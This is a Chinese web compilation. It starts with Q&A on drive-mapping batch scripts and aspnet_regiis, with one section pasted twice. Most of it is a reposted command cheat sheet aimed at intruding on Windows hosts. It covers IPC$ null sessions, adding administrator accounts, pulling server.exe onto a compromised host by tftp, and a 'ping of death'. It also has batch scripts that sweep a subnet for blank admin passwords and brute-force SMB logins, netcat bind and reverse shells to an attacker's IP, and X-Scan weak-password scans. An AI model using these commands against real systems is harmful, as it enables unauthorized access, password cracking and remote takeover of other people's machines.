映射盤符腳本

1. 用BAT腳本實現網路間的文件自動上傳

你這個需求似乎不是「自動上傳」，而是「自動下載」，而且描述不夠全面，疑問有：
1、B機器像是windows系統，A機器是小型機還是PC不明，要是小型機安裝unix/linux等操作系統時，下述的文件共享方式就需要配置samba服務，不如windows系統配置那麼簡單。
2、獲取的文件之名稱固定嗎？如果固定，那麼自動獲取時發現B上已經有同名文件，策略是覆蓋已有文件還是另有安排？如果文件不固定，文件名採用什麼規則命名，是根據日期嗎？

方案有多種，茲介紹兩種，其一是文件共享的方式，其二是ftp方式。

文件共享：
既然A有固定IP，完全可以把那個文件所在的目錄共享出來，為安全計，可以限定訪問者，在B上映射該共享目錄成一個盤符（例如K:），如此，自動獲取文件的批處理主體內容就是執行一個COPY，如COPY /Y K:\myCared.xyz D:\AnotherSavePoint，將這個.BAT配置成任務計劃即可。

FTP方式：
准備工作稍微麻煩一些，需要在A上配置FTP服務，在B上通過ftp.exe執行相應腳本實現。具體方案可以參考如下鏈接，是我對和你這個相似問題的答復。
http://..com/question/195373501.html

2. ASP 添加腳本映射問題

首先確定你安裝了iis
然後從命令行進入文件夾C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\
盤符，系統文件夾，版本號可能不一樣，看你自己的機子，版本號選擇最高的那個文件夾
運行命令aspnet_regiis.exe -i
安裝完畢即可使用vs打開

一點資料:

aspnet_regiis命令詳解.
用法：
aspnet_regiis.exe[-i[r][-enable]|-u[a]|-r|-s[n]|-k[n]|-lv|-lk|-c|-e[a]|-?]
-i-安裝ASP.NET的此版本，並更新IIS元資料庫根處的
腳本映射和根以下的所有
腳本映射。現有的低版本腳本映射
升級到此版本。
-ir-安裝ASP.NET的此版本，僅注冊。不
更新IIS中的腳本映射。
-enable-帶-i或-ir指定-enable時，還將
在IIS安全控制台(IIS6.0或更高版本)中啟用ASP.NET。
-s-在指定的路徑以遞歸方式安裝此版本
的腳本映射。現有的低版本腳本映射
升級到此版本。
例如aspnet_regiis.exe-sW3SVC/1/ROOT/SampleApp1
-sn-在指定的路徑以非遞歸方式安裝此版本的
腳本映射。現有的低版本腳本映射
升級到此版本。
-r-為IIS元資料庫根位置的此版本
以及根以下的所有腳本映射安裝腳本映射。不論當前版本是什麼，
所有現有的腳本映射都
更改為此版本。
-u-卸載ASP.NET的此版本。到此版本的
現有腳本映射重新映射到此計算機上安裝的
其餘的最高ASP.NET版本。
-ua-卸載計算機上的所有ASP.NET版本
-k-從指定的路徑中以遞歸方式移除到任何ASP.NET版本的所有
腳本映射。
例如aspnet_regiis.exe-kW3SVC/1/ROOT/SampleApp1
-kn-從指定的路徑中以非遞歸方式移除到任何ASP.NET版本的所有
腳本映射。
-lv-列出計算機上安裝的所有
ASP.NET版本(包括狀態和安裝路徑)。
Status:Valid[(Root)]|Invalid
-lk-列出包含ASP.NET腳本映射的所有IIS元資料庫項的所有路徑
(連同版本一起)。不顯示從父項
繼承ASP.NET腳本映射的項。
-c-將客戶端腳本的此版本安裝到
每個IIS站點目錄的aspnet_client子目錄中。
-e-從每個IIS站點目錄的aspnet_client子目錄中
移除客戶端腳本的此版本。
-ea-從每個IIS站點目錄的aspnet_client子目錄中
移除客戶端腳本的所有版本。
-?-列印此幫助文本。

example:
當系統新建一個asp.netweb應用程序的時候,提示錯誤信息如下:
"VisualStudio.NET已檢測到指定的Web伺服器運行的不是ASP.NET版本，你將無法運行ASP.NET應用程序或服務。"

可以嘗試運行
aspnet_regiis-i
aspnet_regiis-r
兩個命令來安裝asp.net服務管理器.
如果還是不行的話,再嘗試一下下面的操作:
1、先確定是不是1.1
2、把"IP地址"設成全部未分配
3、在IE連接設置中把本地地址不使用代理伺服器那裡打上勾

3. aspnet_client 的作用以及存儲位置

在虛擬主機的 wwwroot 目錄下您會發現有一個名為 aspnet_client 的文件夾，該文件夾中含有集成了 ASP.NET 的「SmartNavigation」功能的 javascript。如果啟用 SmartNavigation，網頁設計人員就可以在頁面以及其他內容之間保持滾動條和元素焦點的位置。

目錄 aspnet_client 是虛擬根 Web 應用程序目錄，該目錄是當您安裝 .NET Framework SDK 或 Visual Studio .NET 時在您的計算機上創建的。此文件不佔用戶空間，請用戶在使用網站空間的時候不要刪除該文件夾。

例如，隨 ASP.NET 附帶的腳本文件位於以下位置。

d:\home\ftp用戶名/wwwroot/aspnet_client/system_web/<版本編號>/文件

如果安裝有 SDK 的多個版本，您將在 aspnet_client/system_web 下看到多個子目錄。因為控制項庫與腳本文件的特定版本相關聯，所以部署模式允許控制項庫的不同版本並行運行。 出現了「aspnet_client」這個文件夾，是干什麼的？

這個是文件的路徑下還有文件！下面的完整路徑：
aspnet_client\system_web\1_1_4322

裡面還有三個文件：SmartNav.htm，smartnav.js，webuivalidation.js！

作用是：安裝了.net框架之後,就會在網站目錄下出現這樣的文件夾.用以支持.net環境.1_1_4322表示你的.net framework 的版本為 1.1.4322,裡面的3個文件用於為.net驗證控制項提供腳本支持伺服器裡面裝了.net後，會在伺服器上每個網站的目錄裡面增加這個文件夾的 在生成虛擬站點的時候會自動在根下生成一個名字為aspnet_client的文件夾，你看看是不是這個文件夾沒有了？
解決辦法重新建一個獨立站點，把生成的aspnet_client文件夾復制到這個站點的跟下。

首先確定你安裝了iis
然後從命令行進入文件夾C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\
盤符，系統文件夾，版本號可能不一樣，看你自己的機子，版本號選擇最高的那個文件夾
運行命令aspnet_regiis.exe -i
安裝完畢即可使用vs打開
一點資料:

aspnet_regiis命令詳解.
用法：
aspnet_regiis.exe[-i[r][-enable]|-u[a]|-r|-s[n]|-k[n]|-lv|-lk|-c|-e[a]|-?]
-i-安裝ASP.NET的此版本，並更新IIS元資料庫根處的
腳本映射和根以下的所有
腳本映射。現有的低版本腳本映射
升級到此版本。
-ir-安裝ASP.NET的此版本，僅注冊。不
更新IIS中的腳本映射。
-enable-帶-i或-ir指定-enable時，還將
在IIS安全控制台(IIS6.0或更高版本)中啟用ASP.NET。
-s-在指定的路徑以遞歸方式安裝此版本
的腳本映射。現有的低版本腳本映射
升級到此版本。
例如aspnet_regiis.exe-sW3SVC/1/ROOT/SampleApp1
-sn-在指定的路徑以非遞歸方式安裝此版本的
腳本映射。現有的低版本腳本映射
升級到此版本。
-r-為IIS元資料庫根位置的此版本
以及根以下的所有腳本映射安裝腳本映射。不論當前版本是什麼，
所有現有的腳本映射都
更改為此版本。
-u-卸載ASP.NET的此版本。到此版本的
現有腳本映射重新映射到此計算機上安裝的
其餘的最高ASP.NET版本。
-ua-卸載計算機上的所有ASP.NET版本
-k-從指定的路徑中以遞歸方式移除到任何ASP.NET版本的所有
腳本映射。
例如aspnet_regiis.exe-kW3SVC/1/ROOT/SampleApp1
-kn-從指定的路徑中以非遞歸方式移除到任何ASP.NET版本的所有
腳本映射。
-lv-列出計算機上安裝的所有
ASP.NET版本(包括狀態和安裝路徑)。
Status:Valid[(Root)]|Invalid
-lk-列出包含ASP.NET腳本映射的所有IIS元資料庫項的所有路徑
(連同版本一起)。不顯示從父項
繼承ASP.NET腳本映射的項。
-c-將客戶端腳本的此版本安裝到
每個IIS站點目錄的aspnet_client子目錄中。
-e-從每個IIS站點目錄的
aspnet_client子目錄中
移除客戶端腳本的此版本。
-ea-從每個IIS站點目錄的aspnet_client子目錄中
移除客戶端腳本的所有版本。
-?-列印此幫助文本。

example:
當系統新建一個asp.netweb應用程序的時候,提示錯誤信息如下:
"VisualStudio.NET已檢測到指定的Web伺服器運行的不是ASP.NET版本，你將無法運行ASP.NET應用程序或服務。"

可以嘗試運行
aspnet_regiis-i
aspnet_regiis-r
兩個命令來安裝asp.net服務管理器.
如果還是不行的話,再嘗試一下下面的操作:
1、先確定是不是1.1
2、把"IP地址"設成全部未分配
3、在IE連接設置中把本地地址不使用代理伺服器那裡打上勾

4. 如何關閉IPC$共享（不下載腳本，在注冊表裡面關閉）

net share ipc$ /del 刪除ipc$共享

DOS命令字典(收藏）
在俺本地機子上存儲了好久的東東，由於收錄命令多，文章太長...
今天為慶祝hofman無字數限制發文的推出，特拿出來和大家共享~！

net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: \\ip\c$ 登陸後映射對方C：到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務；(如:net start telnet， net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件

#2 二：

del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）
move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1 路徑\文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\admin$ 復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.* 復制對方admini$共享下的srv.exe文件（所有文件）至本地C：
x 要復制的文件或目錄樹 目標地址\目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後，將「IP」的server.exe下載到目標主機c:\server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IP put c:\server.exe 登陸後，上傳本地c:\server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
if 在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：「：start」標簽）
call 路徑\批處理文件名 從批處理程序中調用另一個批處理程序 （更多說明見call /?）
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）
echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值 設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為：EntSky\ )

#3 三：

ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）
format 盤符 /FS:類型 格式化磁碟,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md 目錄名 創建目錄
replace 源文件 要替換文件的目錄 替換文件
ren 原文件名 新文件名 重命名文件名
tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱
type 文件名 顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令＝字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，並創建宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告；加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認埠23為其它任何埠
exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑\可執行文件的文件名 為可執行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?
regedit /s 注冊表文件名 導入注冊表；參數/S指安靜模式導入，無任何提示；
regedit /e 注冊表文件名 導出注冊表
cacls 文件名 參數 顯示或修改文件訪問控制列表（ACL）??針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問許可權；/G 用戶名:perm 賦予指定用戶訪問許可權；Perm 可以是: N 無，R 讀取， W 寫入， C 更改(寫入)，F 完全控制；例：cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub用戶訪問。
cacls 文件名 查看文件的訪問用戶許可權列表
REM 文本內容 在批處理文件中添加註解
netsh 查看或更改本地網路配置情況

#4 四：

IIS服務命令：
iisreset /reboot 重啟win2k計算機（但有提示系統將重啟信息出現）
iisreset /start或stop 啟動（停止）所有Internet服務
iisreset /restart 停止然後重新啟動所有Internet服務
iisreset /status 顯示所有Internet服務狀態
iisreset /enable或disable 在本地系統上啟用（禁用）Internet服務的重新啟動
iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時，若發生錯誤將重新開機
iisreset /noforce 若無法停止Internet服務，將不會強制終止Internet服務
iisreset /timeout Val在到達逾時間（秒）時，仍未停止Internet服務，若指定/rebootonerror參數，則電腦將會重新開機。預設值為重新啟動20秒，停止60秒，重新開機0秒。
FTP 命令： (後面有詳細說明內容)
ftp的命令行格式為:
ftp －v －d －i －n －g[主機名] －v 顯示遠程伺服器的所有響應信息。
－d 使用調試方式。
－n 限制ftp的自動登錄,即不使用.netrc文件。
－g 取消全局文件名。
help [命令] 或 ？[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中
mget [remote-files] 從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件
ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進制方式傳送文件
bell 每完成一次文件傳送,報警提示
cp 返回上一級目錄
close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的文件名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cd remote－dir 進入遠程主機目錄
cp 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell，exit回到ftp環境,如!ls＊.zip

#5 五：

MYsql 命令：
mysql -h主機地址 -u用戶名 －p密碼 連接MYSQL;如果剛安裝好MYSQL，超級用戶root是沒有密碼的。
（例：mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格，其它也一樣）
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼
grant select on 資料庫.* to 用戶名@登錄主機 identified by \"密碼\"; 增加新用戶。（注意：和上面不同，下面的因為是MYSQL環境中的命令，所以後面都帶一個分號作為命令結束符）
show databases; 顯示資料庫列表。剛開始時才兩個資料庫：mysql和test。mysql庫很重要它裡面有MYSQL的系統信息，我們改密碼和新增用戶，實際上就是用這個庫進行操作。
use mysql；
show tables; 顯示庫中的數據表
describe 表名; 顯示數據表的結構
create database 庫名; 建庫
use 庫名；
create table 表名 (欄位設定列表)； 建表
drop database 庫名;
drop table 表名； 刪庫和刪表
delete from 表名; 將表中記錄清空
select * from 表名; 顯示表中的記錄
mysqlmp --opt school>school.bbb 備份資料庫：（命令在DOS的\\mysql\\bin目錄下執行）;注釋:將資料庫school備份到school.bbb文件，school.bbb 是一個文本文件，文件名任取，打開看看你會有新發現。
win2003系統下新增命令（實用部份）：
shutdown /參數 關閉或重啟本地或遠程主機。
參數說明：/S 關閉主機，/R 重啟主機， /T 數字 設定延時的時間，范圍0～180秒之間， /A取消開機，/M //IP 指定的遠程主機。
例：shutdown /r /t 0 立即重啟本地主機（無延時）
taskill /參數 進程名或進程的pid 終止一個或多個任務和進程。
參數說明：/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid，/IM 要終止的進程的進程名，/F 強制終止進程，/T 終止指定的進程及他所啟動的子進程。
tasklist 顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID)。
參數說明：/M 列出當前進程載入的dll文件，/SVC 顯示出每個進程對應的服務，無參數時就只列出當前的進程。

#6 六：

Linux系統下基本命令： 要區分大小寫
uname 顯示版本信息（同win2K的 ver）
dir 顯示當前目錄文件,ls -al 顯示包括隱藏文件（同win2K的 dir）
pwd 查詢當前所在的目錄位置
cd cd ..回到上一層目錄，注意cd 與..之間有空格。cd /返回到根目錄。
cat 文件名 查看文件內容
cat >abc.txt 往abc.txt文件中寫上內容。
more 文件名 以一頁一頁的方式顯示一個文本文件。
cp 復制文件
mv 移動文件
rm 文件名 刪除文件，rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名 建立目錄
rmdir 刪除子目錄，目錄內沒有文檔。
chmod 設定檔案或目錄的存取許可權
grep 在檔案中查找字元串
diff 檔案文件比較
find 檔案搜尋
date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機（同win2K），當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器（同win2K）

附：批處理命令與變數

1：for命令及變數 基本格式：
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數，如：%i ，而指定一個變數則用：%%i ，而調用變數時用：%i% ，變數是區分大小寫的（%i 不等於 %I）。
批處理每次能處理的變數從%0?%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2?%9指輸入的第2-9個值；例：net use \\ip\ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3

(set):指定一個或一組文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{ 「(1 1 254)」第一個"1"指起始值，第二個"1"指增長量，第三個"254"指結束值，即：從1到254；「(1 -1 254)」說明：即從254到1 }

command：指定對第個文件執行的命令，如：net use命令；如要執行多個命令時，命令這間加：& 來隔開
command_parameters：為特定命令指定參數或命令行開關

IN (set)：指在(set)中取值；DO command ：指執行command

參數：/L 指用增量形式{ (set)為增量形式時 }；/F 指從文件中不斷取值，直到取完為止{ (set)為文件時，如(d:\pass.txt)時 }。
用法舉例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明：對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接，如果成功就把該IP存在test.txt中。

/L 指用增量形式（即從1-254或254-1）；輸入的IP前面三位：*.*.*為批處理默認的 %1；%%G 為變數(ip的最後一位）；& 用來隔開echo 和net use 這二個命令；| 指建立了ipc$後，在結果中用find查看是否有"命令成功完成"信息；%1.%%G 為完整的IP地址；(1 1 254) 指起始值，增長量，結止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存為：ok.exe 說明：輸入一個IP後，用字典文件d:\pass.dic來暴解d:\user.dic中的用戶密碼，直到文件中值取完為止。%%i為用戶名；%1為輸入的IP地址（默認）。

#7 七：

2：if命令及變數 基本格式：
IF [not] errorlevel 數字 命令語句 如果程序運行最後返回一個等於或大於指定數字的退出編碼，指定條件為「真」。
例：IF errorlevel 0 命令 指程序執行後返回的值為0時，就值行後面的命令；IF not errorlevel 1 命令指程序執行最後返回的值不等於1，就執行後面的命令。
0 指發現並成功執行（真）；1 指沒有發現、沒執行（假）。
IF [not] 字元串1==字元串2 命令語句 如果指定的文本字元串匹配（即：字元串1 等於 字元串2），就執行後面的命令。
例：「if "%2%"=="4" goto start」指：如果輸入的第二個變數為4時，執行後面的命令（注意：調用變數時就%變數名%並加" "）
IF [not] exist 文件名 命令語句 如果指定的文件名存在，就執行後面的命令。
例：「if not nc.exe goto end」指：如果沒有發現nc.exe文件就跳到":end"標簽處。
IF [not] errorlevel 數字 命令語句 else 命令語句或 IF [not] 字元串1==字元串2 命令語句 else 命令語句或 IF [not] exist 文件名 命令語句 else 命令語句 加上：else 命令語句後指：當前面的條件不成立時，就指行else後面的命令。注意：else 必須與 if 在同一行才有效。當有del命令時需把del命令全部內容用< >括起來，因為del命令要單獨一行時才能執行，用上< >後就等於是單獨一行了；例如：「if exist test.txt. else echo test.txt.missing 」，注意命令中的「.」

（二）系統外部命令(均需下載相關工具)：

1、瑞士軍刀：nc.exe

參數說明：
-h 查看幫助信息
-d 後台模式
-e prog程序重定向，一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式，用於入站連接
-L 監聽模式，連接天閉後仍然繼續監聽，直到CTR+C
-n IP地址，不能用域名
-o film記錄16進制的傳輸
-p[空格]埠 本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出，用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入，輸出關掉（用於掃錨時）
基本用法：
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354埠
高級用法：
nc -L -p 80 作為蜜罐用1：開啟並不停地監聽80埠，直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2：開啟並不停地監聽80埠，直到CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1：開啟並不停地監聽80埠，直到CTR+C,並把c:\honeyport.txt中內容送入管道中，亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2：開啟並不停地監聽80埠，直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用：nc -l -p 本機埠
在對方主機上用：nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用：nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用：nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱 傳送文件到對方主機
備 註：
| 管道命令
< 或 > 重定向命令。「<」，例如：tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
＠ 表示執行＠後面的命令，但不會顯示出來（後台執行）；例：＠dir c:\winnt >> d:\log.txt 意思是：後台執行dir，並把結果存在d:\log.txt中
>與>>的區別 ">"指：覆蓋；">>"指：保存到(添加到）。
如： @dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別執行二次比較看：用>>的則是把二次的結果都保存了，而用：>則只有一次的結果，是因為第二次的結果把第一次的覆蓋了。

#8 八：

2、掃錨工具：xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型（通過NETBIOS和SNMP協議）
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量 指定最大並發線程數量和並發主機數量, 默認數量為100,10
-log 文件名 指定掃描報告文件名 (後綴為：TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞，跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標准埠狀態，NT弱口令用戶，最大並發線程數量為150，跳過沒有檢測到開放埠的主機
